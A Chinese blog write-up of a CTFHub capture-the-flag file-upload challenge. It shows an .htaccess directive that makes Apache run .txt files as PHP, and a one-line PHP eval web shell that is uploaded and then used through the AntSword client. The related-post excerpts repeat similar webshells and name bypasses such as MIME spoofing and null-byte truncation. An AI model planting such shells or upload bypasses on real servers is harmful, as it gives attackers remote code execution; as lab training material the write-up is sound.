CTFHub_技能树_Web之文件上传——“.htaccess”

最新推荐文章于 2024-08-02 03:00:00 发布
最新推荐文章于 2024-08-02 03:00:00 发布
阅读量1.6k 收藏 5
点赞数 2
分类专栏: # CTF-Web 文章标签: php 安全 信息安全 .htaccess
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/107557860
版权

文章目录

–>CTFHub传送门<–

使用工具

  1. Microsoft Edge v84.0.522.40
  2. 中国蚁剑

.htaccess文件

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。
——百度百科

通过编辑.htaccess文件将特定后缀的文件解析为PHP执行

解题过程

直接上传PHP文件无法上传,题目提示.htaccess文件

首先新建txt文件,写入以下代码

#将txt文件解析为PHP文件执行
AddType application/x-httpd-php .txt

将该.txt文件更改后缀为.htaccess,上传
在这里插入图片描述

再新建一个shell.txt,写入PHP代码

<?php 
echo "PHP Loaded";
eval(@$_POST['a']);
?>

上传成功,访问/upload/shell.txt成功
在这里插入图片描述

使用蚁剑访问得到FLAG
注意URL地址和密码
在这里插入图片描述

欢迎在评论区留言
感谢浏览

Ho1aAs
关注
专栏目录
3.18号日报,ctfhubweb文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhubweb文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
CTFHub | .htaccess
尼泊罗河伯的博客
03-18 1400
htaccess 文件是 Apache 服务器中的一个配置文件,它负责相关目录下的网页配置。通过 htaccess 文件,可以帮我们实现:网页 301 重定向、自定义 404 错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
ctfhub文件上传---.htaccess
x2813488062的博客
01-28 1126
.htaccess详解 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。 .htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。 .htac..
CTFHUB-文件上传-.htaccess
最新发布
weixin_68416970的博客
08-02 248
CTFHUB技能树文件上传漏洞、.htaccess的过关教程
CTFHub技能树 Web-文件上传详解
千寻的博客
11-21 3793
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 ———————————————— 版权声明:本文为CSDN博主「Fasthand_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:ht
CTFHub技能树web文件上传.htaccess
qq_53148935的博客
04-04 756
注:本人第一次写博客,主要是为了记录解题过程,如有不足之处,欢迎指出,但勿喷。 这几天开始做了些ctfhub技能树里面的题目,因为我们这学期开始学了一些web攻防的内容,然后就想着去ctfhub练练技能,话不多说,我们直接进入解题过程。 先看看题目 这里给了些提示内容,说htaccess文件是apache的一个配置文件之类的,有兴趣可以自行百度了解一下。在这题里面,htaccess文件的作用就是让别的文件以你指定的方式运行,如.txt文件可以以.php文件的形式运行。 了解了这些之后我们就会有一
CTFHub 文件上传 - htaccess
ph51342的博客
07-03 471
CTFHub 文件上传 – htaccess
apache-web-server-lm.zip_Apache Web_Apache Web Server_apache
09-22
- 权限和访问控制:使用`.htaccess`文件进行目录级别的权限设定,限制非法访问。 - 负载均衡和集群:如何配置Apache以实现多服务器间的负载分发。 通过深入学习和理解这份配置手册,无论是初学者还是经验丰富的...
用ISAPI_Rewrite让IIS也支持如Apache下.htaccess的URL重写
10-01
ISAPI_Rewrite是一款强大的URL重写工具,专为Microsoft IIS服务器设计,使得IIS能够支持类似于Apache服务器中.htaccess文件的URL重写功能。在Apache服务器中,.htaccess文件是用于配置服务器行为,特别是URL重写规则...
Apache服务器中.htaccess文件的实用配置示例集锦
09-10
Apache服务器中的`.htaccess`文件是一个非常重要的工具,它允许网站管理员无需直接修改服务器的主配置文件即可控制和定制特定目录的行为。`.htaccess`文件主要用于实现一系列HTTP服务器的指令,如URL重写、访问控制...
ctfhub-前端验证,.htaccess,MIME绕过,文件头检查,00截断,双写后缀
weixin_55702959的博客
02-02 1369
目录 文件上传-前端验证 文件上传-.htaccess 文件上传-MIME绕过 文件上传-文件头检查 文件上传-00截断 文件上传-双写后缀 eval执行 文件上传-前端验证 上传文件时,客户端的javascript会对文件的类型进行一个校验,只允许 “.jpg” “.png” ".gif"的文件上传,于是关掉他 about:config 一句木马 <?php @eval($_POST['123']); ?> 命名为1.php之后上传文件,用蚁剑打...
CTFHub技能树 Web-文件上传 详解
weixin_45808483的博客
11-15 2743
无验证 启动环境 我们上传一句话木马 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用蚁剑连接。 找到flag。 前端验证 上传php文件,前端校验不允许上传php文件 审计代码,只允许上传图片类型 我们先将后缀改为 .jpg 上传成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上传成功 使用蚁剑连接 成...
ctfhub技能树web
m0_58030673的博客
05-19 1146
ctfhub技能树web方向wp
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2292
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
CTFHub_.htaccess
阿刁〇的博客
05-16 938
文章目录CTFHub_.htaccess CTFHub_.htaccess .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 .htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htac
CTFHubweb文件上传
2301_81105268的博客
04-02 911
通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。当你连接一些公网时,可能文件上传操作正确但无法成功,是因为一些网络具备了高级的防火墙,无法上传一句话木马等病毒文件。使用重放器发送,在响应栏中可以看到网页返回200,说明文件上传成功。发送到重放器后,将1.php修改为1.php%00.jpg。查看源代码,只允许上传图片类型(jpg,png,gif)查看源代码,简单的文件上传,没有限制。
CTFHUB-web-文件上传
2301_79783285的博客
12-23 1403
htaccess是一个纯文本文件,存放着Apache服务器配置相关的指令。.htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。.htaccess的用途范围主要针对当前目录。注意:.htaccess文件(特别注意这里文件名不可随意更改,因为 .htaccess 是配置文件)博主这里帮大家把坑踩了,蚁剑死活连不上的原因。
解决 linux tab 不提示问题, cannot create temp file for here-document:No sapce left on device
汇杰IT博客
07-22 1616
1、问题发现 我要进一个文件夹,然后Tab键进行补全,然后呢就显示: 2、解决问题 查看磁盘文件 df -h 发现根目录爆满然后进入根目录,查看那个文件占的内存比较多, cd / du -sh * 我查看之后是/var文件下的下的log日志文件比较多,然后删除日志文件 释放完成后,即可 ...
ctf技能树文件上传.htaccess
04-30
文件上传漏洞通常是指在网站中存在对用户上传文件的功能,但是没有对上传文件的类型、大小、数量、路径等进行严格限制或过滤,从而导致攻击者可以通过上传包含恶意代码的文件来实现攻击的目的。而.htaccess是一个常用于Apache服务器的配置文件,可以用来设置网站的访问权限、页面重定向、防止目录遍历等功能。 因此,攻击者可以通过上传一个包含了.htaccess文件的恶意文件来实现对服务器的攻击。比如,攻击者可以在.htaccess文件中添加一些重定向规则,将用户的访问请求重定向到攻击者控制的恶意网站上,从而实现诱导用户下载恶意软件或者窃取用户敏感信息等攻击。 防范措施: 1. 限制上传文件的类型、大小、数量等,可以通过后台代码或第三方插件实现; 2. 对上传文件进行严格过滤和检查,确保不包含任何可执行的恶意代码; 3. 对服务器上的.htaccess文件进行定期检查和清理,确保其中不包含任何不安全的设置; 4. 定期升级服务器操作系统、Web服务器和相关应用程序的补丁,确保服务器的安全性。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值